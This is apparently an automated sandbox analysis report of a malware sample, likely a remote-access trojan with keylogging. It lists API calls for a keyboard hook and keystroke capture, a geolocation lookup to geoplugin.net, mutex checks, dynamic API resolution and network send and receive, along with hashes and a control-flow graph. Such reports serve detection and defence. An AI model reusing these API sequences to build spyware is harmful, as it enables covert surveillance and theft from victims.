47366->47375 47367 30dc5ad FreeEnvironmentStringsW 47368 30d0ca4 47367->47368 47368->47357 47376 30d0d39 26 API calls 4 library calls 47368->47376 47383 30d3649 21 API calls 3 library calls 47369->47383 47371 30dc579 47372 30dc596 47371->47372 47373 30dc580 WideCharToMultiByte 47371->47373 47374 30d3c92 _free 20 API calls 47372->47374 47373->47372 47374->47375 47375->47367 47375->47368 47376->47361 47378 30d3c9d RtlFreeHeap 47377->47378 47379 30d3cc6 _free 47377->47379 47378->47379 47380 30d3cb2 47378->47380 47379->47357 47384 30cad91 20 API calls _free 47380->47384 47382 30d3cb8 GetLastError 47382->47379 47383->47371 47384->47382 47385 30c9be8 47387 30c9bf4 _swprintf ___BuildCatchObject 47385->47387 47386 30c9c02 47401 30cad91 20 API calls _free 47386->47401 47387->47386 47389 30c9c2c 47387->47389 47396 30d2d9a EnterCriticalSection 47389->47396 47391 30c9c37 47397 30c9cd8 47391->47397 47392 30c9c07 pre_c_initialization ___BuildCatchObject 47396->47391 47398 30c9ce6 47397->47398 47398->47398 47400 30c9c42 47398->47400 47403 30d6c9b 36 API calls 2 library calls 47398->47403 47402 30c9c5f LeaveCriticalSection std::_Lockit::~_Lockit 47400->47402 47401->47392 47402->47392 47403->47398 47404 309932c 47407 30993ef 47404->47407 47406 309933d 47408 309940c 47407->47408 47409 309944f CallNextHookEx 47407->47409 47410 3099438 47408->47410 47411 3099417 47408->47411 47409->47406 47420 309a16d 47410->47420 47412 309941c 47411->47412 47413 309942a 47411->47413 47412->47409 47477 309a592 36 API calls 47412->47477 47478 309a5ec 30 API calls 47413->47478 47418 3099428 47418->47409 47421 309a17c 47420->47421 47422 3092073 28 API calls 47421->47422 47423 3099444 47421->47423 47424 309a409 47422->47424 47423->47409 47426 309a439 47423->47426 47479 3099609 29 API calls 47424->47479 47427 309a57c 47426->47427 47428 309a453 47426->47428 47480 3099468 47427->47480 47429 309a459 47428->47429 47430 309a4d7 47428->47430 47433 309a57a 47429->47433 47438 3092073 28 API calls 47429->47438 47432 3092073 28 API calls 47430->47432 47436 309a4e5 47432->47436 47433->47409 47437 3092073 28 API calls 47436->47437 47440 309a4f3 47437->47440 47439 309a481 47438->47439 47485 30ca2cf 43 API calls 47439->47485 47489 30a9bca 28 API calls 47440->47489 47443 309a48f 47445 3092073 28 API calls 47443->47445 47444 309a503 47490 309a65a 31 API calls 47444->47490 47447 309a49f 47445->47447 47486 309826c 28 API calls 47447->47486 47448 309a516 47491 30a9bca 28 API calls 47448->47491 47451 309a4aa 47487 3092e81 28 API calls 47451->47487 47452 309a524 47492 3092f85 28 API calls 47452->47492 47455 309a4b4 47488 3099609 29 API calls 47455->47488 47456 309a52f 47493 3092f85 28 API calls 47456->47493 47459 309a4bc 47461 3091fb8 11 API calls 47459->47461 47460 309a539 47494 309962e 12 API calls 47460->47494 47463 309a4c5 47461->47463 47466 3091fb8 11 API calls 47463->47466 47464 309a541 47465 3091ee9 11 API calls 47464->47465 47467 309a54a 47465->47467 47468 309a4ce 47466->47468 47469 3091ee9 11 API calls 47467->47469 47471 3091fb8 11 API calls 47468->47471 47470 309a553 47469->47470 47472 3091ee9 11 API calls 47470->47472 47471->47433 47473 309a55c 47472->47473 47474 3091ee9 11 API calls 47473->47474 47475 309a568 47474->47475 47476 3091fb8 11 API calls 47475->47476 47476->47468 47477->47418 47478->47418 47479->47423 47481 30c4c30 ___scrt_fastfail 47480->47481 47482 3099489 6 API calls 47481->47482 47483 309415e 28 API calls 47482->47483 47484 30994f3 47483->47484 47495 309962e 12 API calls 47484->47495 47485->47443 47486->47451 47487->47455 47488->47459 47489->47444 47490->47448 47491->47452 47492->47456 47493->47460 47494->47464 47495->47433 47496 30a46ff 47511 30a936b 47496->47511 47498 30a4708 47499 30920d6 28 API calls 47498->47499 47500 30a4717 47499->47500 47522 3094a81 58 API calls _Yarn 47500->47522 47502 30a4723 47503 30a5654 47502->47503 47504 3091fb8 11 API calls 47502->47504 47505 3091e6d 11 API calls 47503->47505 47504->47503 47506 30a565d 47505->47506 47507 3091fb8 11 API calls 47506->47507 47508 30a5669 47507->47508 47509 3091fb8 11 API calls 47508->47509 47510 30a5675 47509->47510 47512 30920bf 11 API calls 47511->47512 47513 30a9379 47512->47513 47514 30c9adb new 21 API calls 47513->47514 47515 30a9389 InternetOpenW InternetOpenUrlW 47514->47515 47516 30a93b0 InternetReadFile 47515->47516 47520 30a93d3 47516->47520 47517 3092097 28 API calls 47517->47520 47518 30a9400 InternetCloseHandle InternetCloseHandle 47519 30a9412 47518->47519 47519->47498 47520->47516 47520->47517 47520->47518 47521 3091fb8 11 API calls 47520->47521 47521->47520 47522->47502 47523 309163e 47524 3091646 47523->47524 47526 3091649 47523->47526 47525 3091688 47527 30c229f new 22 API calls 47525->47527 47526->47525 47529 3091676 47526->47529 47528 309167c 47527->47528 47530 30c229f new 22 API calls 47529->47530 47530->47528 47531 30abd72 47532 30abd87 _Yarn ___scrt_fastfail 47531->47532 47534 30c0c79 21 API calls 47532->47534 47544 30abf8a 47532->47544 47535 30abf37 ___scrt_fastfail 47534->47535 47536 30abf3e 47535->47536 47539 30c0c79 21 API calls 47535->47539 47537 30abf9b 47537->47536 47538 30c0c79 21 API calls 47537->47538 47540 30abfd4 ___scrt_fastfail 47538->47540 47542 30abf64 ___scrt_fastfail 47539->47542 47540->47536 47546 30c12ff 47540->47546 47542->47536 47543 30c0c79 21 API calls 47542->47543 47543->47544 47544->47536 47545 30ab917 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 47544->47545 47545->47537 47549 30c121e 47546->47549 47548 30c1307 47548->47536 47550 30c1237 47549->47550 47554 30c122d 47549->47554 47551 30c0c79 21 API calls 47550->47551 47550->47554 47552 30c1258 47551->47552 47552->47554 47555 30c15ec CryptAcquireContextA 47552->47555 47554->47548 47556 30c160d CryptGenRandom 47555->47556 47557 30c1608 47555->47557 47556->47557 47558 30c1622 CryptReleaseContext 47556->47558 47557->47554 47558->47557 47559 30b4991 47565 30b4a66 recv 47559->47565 47566 30b4a00 47571 30b4a7d send 47566->47571

                                                              Executed Functions

                                                              Function 03099340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0309935B
                                                              • SetWindowsHookExA.USER32(0000000D,0309932C,00000000), ref: 03099369
                                                              • GetLastError.KERNEL32 ref: 03099375
                                                                • Part of subcall function 030A94DA: GetLocalTime.KERNEL32(00000000), ref: 030A94F4
                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 030993C3
                                                              • TranslateMessage.USER32(?), ref: 030993D2
                                                              • DispatchMessageA.USER32(?), ref: 030993DD
                                                              Strings
                                                              • Keylogger initialization failure: error , xrefs: 03099389
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                              • String ID: Keylogger initialization failure: error
                                                              • API String ID: 3219506041-952744263
                                                              • Opcode ID: c5f3f0135a66b1a647d343ffc855d05720416a2b7b0c965bd09553cabf7d615c
                                                              • Instruction ID: 8a4f791e09c7e7785422d2f9b0359b0ff4b2931994d2c0a0b9a522166c63a3d9
                                                              • Opcode Fuzzy Hash: c5f3f0135a66b1a647d343ffc855d05720416a2b7b0c965bd09553cabf7d615c
                                                              • Instruction Fuzzy Hash: F311C135706305ABEB10FBB5EC0986F77ECEBD9A11B104A6EF891C6584EB358500C7A5
                                                              Function 030A936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 030A9392
                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 030A93A8
                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 030A93C1
                                                              • InternetCloseHandle.WININET(00000000), ref: 030A9407
                                                              • InternetCloseHandle.WININET(00000000), ref: 030A940A
                                                              Strings
                                                              • http://geoplugin.net/json.gp, xrefs: 030A93A2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Internet$CloseHandleOpen$FileRead
                                                              • String ID: http://geoplugin.net/json.gp
                                                              • API String ID: 3121278467-91888290
                                                              • Opcode ID: 22f552de110471556c57d515bee35dbd59571bd198c3ac40ca62adf74400925a
                                                              • Instruction ID: af6d5915f3a9fe9bc9fdc004ec1b1d81b2190aa746d61052b5745393ddd5f7f9
                                                              • Opcode Fuzzy Hash: 22f552de110471556c57d515bee35dbd59571bd198c3ac40ca62adf74400925a
                                                              • Instruction Fuzzy Hash: 7F1182357073166BD624EB25AC48DEF7EECEFC5660F00043DF90596281DB659804C6A5
                                                              Function 03099468 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetForegroundWindow.USER32(03102008,?,03102008), ref: 0309949C
                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 030994A7
                                                              • GetKeyboardLayout.USER32(00000000), ref: 030994AE
                                                              • GetKeyState.USER32(00000010), ref: 030994B8
                                                              • GetKeyboardState.USER32(?), ref: 030994C5
                                                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 030994E1
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                                                              • String ID:
                                                              • API String ID: 3566172867-0
                                                              • Opcode ID: 105ddeb08a082523fc587e92aecc47af99d3a13ce1a0cde3e9bfb84cbce61321
                                                              • Instruction ID: c254eddf1c8b907763d996bb442b33ed3c5d91d3dd97ffa2176dcedf6c4cbb10
                                                              • Opcode Fuzzy Hash: 105ddeb08a082523fc587e92aecc47af99d3a13ce1a0cde3e9bfb84cbce61321
                                                              • Instruction Fuzzy Hash: 19115272A0120CABDB10EBF4EC49FDA77BCEB5C711F000455F604DB184E676AD548BA4
                                                              Function 0309E18D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 030A1F34: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 030A1F54
                                                                • Part of subcall function 030A1F34: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,03102200), ref: 030A1F72
                                                                • Part of subcall function 030A1F34: RegCloseKey.KERNEL32(?), ref: 030A1F7D
                                                              • Sleep.KERNEL32(00000BB8), ref: 0309E243
                                                              • ExitProcess.KERNEL32 ref: 0309E2B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                                              • String ID: 3.8.0 Pro$override$pth_unenc
                                                              • API String ID: 2281282204-3177840460
                                                              • Opcode ID: d3acdf1f972e603bae62c49a63af5ca0c9f919fb4459945b35463e41a92a79d8
                                                              • Instruction ID: 1645494599b7957733ae6da9aba62a1a210cb8dfdb9ced6a7ce49f8c39233081
                                                              • Opcode Fuzzy Hash: d3acdf1f972e603bae62c49a63af5ca0c9f919fb4459945b35463e41a92a79d8
                                                              • Instruction Fuzzy Hash: 88212734B527042FEE08F6BD9C16BEF368DABD1600F400819E9165F2C6EEB59E0183D2
                                                              Function 030C15EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,030C1372,00000024,?,?,?), ref: 030C15FE
                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,030BB81F,?), ref: 030C1614
                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,030BB81F,?), ref: 030C1626
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                              • String ID:
                                                              • API String ID: 1815803762-0
                                                              • Opcode ID: e1758db6c071d6f3988b17d14dcaaeb3a3dca8036e64fd80d545462bc3667441
                                                              • Instruction ID: a378f8dea9cb78798d65f5831f7783cf2853cdbc0a4dbfba2f7ea69d5007ce31
                                                              • Opcode Fuzzy Hash: e1758db6c071d6f3988b17d14dcaaeb3a3dca8036e64fd80d545462bc3667441
                                                              • Instruction Fuzzy Hash: F6E0123131A260BAEB749F15BC08F5B2A99EB89B72F290A2DF155E90D8D7624840855C
                                                              Function 030A95F8 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetComputerNameExW.KERNEL32(00000001,?,00000037,03101FFC), ref: 030A9615
                                                              • GetUserNameW.ADVAPI32(?,00000010), ref: 030A962D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Name$ComputerUser
                                                              • String ID:
                                                              • API String ID: 4229901323-0
                                                              • Opcode ID: 417a71fa0a5cf22442fda67ae5b35424539a56c96b83d9d22b2fc8c3941ec2e7
                                                              • Instruction ID: 8cd506476fc6c8599c66cc30645379c3842ab3d439201a470152ca1b9481b19d
                                                              • Opcode Fuzzy Hash: 417a71fa0a5cf22442fda67ae5b35424539a56c96b83d9d22b2fc8c3941ec2e7
                                                              • Instruction Fuzzy Hash: 3301627690121CAFDF04EBD4DC44EDEB7BCAF44314F000166E505BA154EEB46A89DB94
                                                              Function 0309E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,030A3F34,03101E78,03102910,03101E78,00000000,03101E78,00000000,03101E78,3.8.0 Pro), ref: 0309E2CF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 246163e167ddd273ff7c0b3eaba2358d04f3f45c7e97148971392ecf78fb5710
                                                              • Instruction ID: 9c09c3a834eb762114374a850475409b11aeeb37f87f6ba67aece1c0d7680944
                                                              • Opcode Fuzzy Hash: 246163e167ddd273ff7c0b3eaba2358d04f3f45c7e97148971392ecf78fb5710
                                                              • Instruction Fuzzy Hash: 31D05B3074521C77E910D6859C0AEAB779CD741A62F000156B904D7280D9E16E0487D1
                                                              Function 030AA8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA8EF
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA8F8
                                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA90F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA912
                                                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA924
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA927
                                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA93D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA940
                                                              • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0309D40C), ref: 030AA951
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA954
                                                              • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0309D40C), ref: 030AA969
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA96C
                                                              • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0309D40C), ref: 030AA97D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA980
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0309D40C), ref: 030AA98C
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA98F
                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0309D40C), ref: 030AA9A1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9A4
                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0309D40C), ref: 030AA9B1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9B4
                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0309D40C), ref: 030AA9C5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9C8
                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0309D40C), ref: 030AA9D5
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9D8
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0309D40C), ref: 030AA9EA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9ED
                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0309D40C), ref: 030AA9FA
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AA9FD
                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0309D40C), ref: 030AAA0A
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA0D
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0309D40C), ref: 030AAA1F
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA22
                                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0309D40C), ref: 030AAA30
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA33
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0309D40C), ref: 030AAA40
                                                              • GetProcAddress.KERNEL32(00000000), ref: 030AAA43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, Offset: 03090000, based on PE: true
                                                              • Associated: 00000005.00000002.3792390039.0000000003105000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_3090000_colorcpl.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$HandleModule$LibraryLoad
                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                              • API String ID: 551388010-2474455403
                                                              • Opcode ID: e3174a583557d468c83809b0d1c9f21601f2922ca19cffd8ab8dc9be103356be
                                                              • Instruction ID: 9a9a3041befd50dd566d890101008ba14bcaadac710c3813bdb50a99f5716c69
                                                              • Opcode Fuzzy Hash: e3174a583557d468c83809b0d1c9f21601f2922ca19cffd8ab8dc9be103356be
                                                              • Instruction Fuzzy Hash: 45317564E4639CBECA14FBBA6C49E1F3E9CE9487587420526F214E7906DBBC9440CE74
                                                              Function 0309D3F0 Relevance: 51.5, APIs: 17, Strings: 12, Instructions: 774COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 7 309d3f0-309d45f call 30aa8da call 309dd83 call 30920d6 * 2 call 30a9d87 call 309e563 call 3091e6d call 30ca300 24 309d4b8-309d57f call 3091e45 call 3091f8b call 3091e45 call 30952fe call 3098209 call 3091fc2 call 3091fb8 * 2 call 3091e45 call 3091fa0 call 3095a86 call 3091e45 call 30951c3 call 3091e45 call 30951c3 7->24 25 309d461-309d4b5 call 309e609 call 3091e45 call 3091f8b call 309f98d call 309e5ba call 309dd70 call 3091fb8 7->25 70 309d5cf-309d5ea call 3091e45 call 309fbab 24->70 71 309d581-309d5c9 call 309822a call 3091fc2 call 3091fb8 call 3091f8b call 30a1f34 24->71 80 309d5ec-309d60d call 3091e45 call 3091f8b OpenMutexA 70->80 81 309d656-309d679 call 3091f8b CreateMutexA GetLastError 70->81 71->70 105 309dd0f-309dd27 call 3091f8b call 30a239a call 30a0eda 71->105 101 309d60f-309d61c WaitForSingleObject CloseHandle 80->101 102 309d622-309d63f call 3091f8b call 30a1f34 80->102 91 309d67f-309d686 81->91 92 309d991-309d99a call 3091fb8 81->92 96 309d688 91->96 97 309d68a-309d6a7 GetModuleFileNameW call 30a92ae 91->97 109 309d9a1-309da01 call 30c4c30 call 309245c call 3091f8b * 2 call 30a20e8 call 3098093 92->109 96->97 107 309d6a9-309d6ab 97->107 108 309d6b0-309d6b4 97->108 101->102 122 309d651 102->122 123 309d641-309d650 call 3091f8b call 30a239a 102->123 136 309dd2c 105->136 107->108 113 309d717-309d72a call 3091e45 call 3091f8b 108->113 114 309d6b6-309d6c9 call 3091e45 call 3091f8b 108->114 175 309da06-309da5f call 3091e45 call 3091f8b call 3092073 call 3091f8b call 30a215f call 3091e45 call 3091f8b call 30c9867 109->175 138 309d72c call 309e501 113->138 139 309d731-309d7ad call 3091e45 call 3091f8b call 3098093 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3091e45 call 3091f8b 113->139 114->113 142 309d6cb-309d6d1 114->142 122->81 123->122 143 309dd31-309dd65 call 3092073 call 30952dd call 3092073 call 30a94da call 3091fb8 136->143 138->139 217 309d7af-309d7c8 call 3091e45 call 3091f8b call 30c9891 139->217 218 309d815-309d819 139->218 142->113 148 309d6d3-309d6d9 142->148 188 309dd6a-309dd6f call 30a3980 143->188 152 309d6db-309d6ee call 30960ea 148->152 153 309d6f7-309d710 call 3091f8b call 30a1eea 148->153 152->113 165 309d6f0-309d6f5 call 30967a0 152->165 153->113 179 309d712 call 30966a6 153->179 165->113 220 309da61-309da63 175->220 221 309da65-309da67 175->221 179->113 217->218 247 309d7ca-309d810 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 309c5ed call 3091ef3 call 3091ee9 217->247 218->109 219 309d81f-309d826 218->219 223 309d828-309d8a5 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 309b871 219->223 224 309d8a7-309d8b1 call 3098093 219->224 225 309da6b-309da7c call 30aaa4f CreateThread 220->225 226 309da69 221->226 227 309da7e-309db48 call 3092073 * 2 call 30a94da call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 30c9867 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 3098f1f call 3091e45 call 3091f8b 221->227 236 309d8b6-309d8de call 309245c call 30c254d 223->236 224->236 225->227 226->225 349 309db4a-309db81 call 30c229f call 3091e45 call 3091f8b CreateThread 227->349 350 309db83-309db9a call 3091e45 call 3091f8b 227->350 257 309d8f0 236->257 258 309d8e0-309d8ee call 30c4c30 236->258 247->218 263 309d8f2-309d93d call 3091ee4 call 30ca796 call 309245c call 3091f8b call 309245c call 3091f8b call 30a2338 257->263 258->263 316 309d942-309d967 call 30c2556 call 3091e45 call 309fbab 263->316 316->175 332 309d96d-309d98c call 3091e45 call 30a9bca call 309de34 316->332 332->175 346 309d98e-309d990 332->346 346->92 349->350 360 309dbd9-309dbeb call 3091e45 call 3091f8b 350->360 361 309db9c-309dbd4 call 30c229f call 3091e45 call 3091f8b CreateThread 350->361 372 309dbed-309dc47 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 309c5a1 call 3091ef3 call 3091ee9 CreateThread 360->372 373 309dc4c-309dc5e call 3091e45 call 3091f8b 360->373 361->360 372->373 383 309dc99-309dcbf call 30a95f8 call 3091ef3 call 3091ee9 373->383 384 309dc60-309dc94 call 3091e45 call 3091f8b call 3091e45 call 3091f8b call 30c9867 call 309b0a3 373->384 406 309dcc1-309dcc2 SetProcessDEPPolicy 383->406 407 309dcc4-309dcd7 CreateThread 383->407 384->383 406->407 408 309dcd9-309dce3 CreateThread 407->408 409 309dce5-309dcec 407->409 408->409 412 309dcfa-309dd01 409->412 413 309dcee-309dcf8 CreateThread 409->413 412->136 416 309dd03-309dd06 412->416 413->412 416->188 418 309dd08-309dd0d 416->418 418->143
                                                              APIs
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA8EF
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA8F8
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0309D40C), ref: 030AA90F
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA912
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA924
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA927
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0309D40C), ref: 030AA93D
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA940
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0309D40C), ref: 030AA951
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA954
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0309D40C), ref: 030AA969
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA96C
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0309D40C), ref: 030AA97D
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA980
                                                                • Part of subcall function 030AA8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0309D40C), ref: 030AA98C
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA98F
                                                                • Part of subcall function 030AA8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0309D40C), ref: 030AA9A1
                                                                • Part of subcall function 030AA8DA: GetProcAddress.KERNEL32(00000000), ref: 030AA9A4
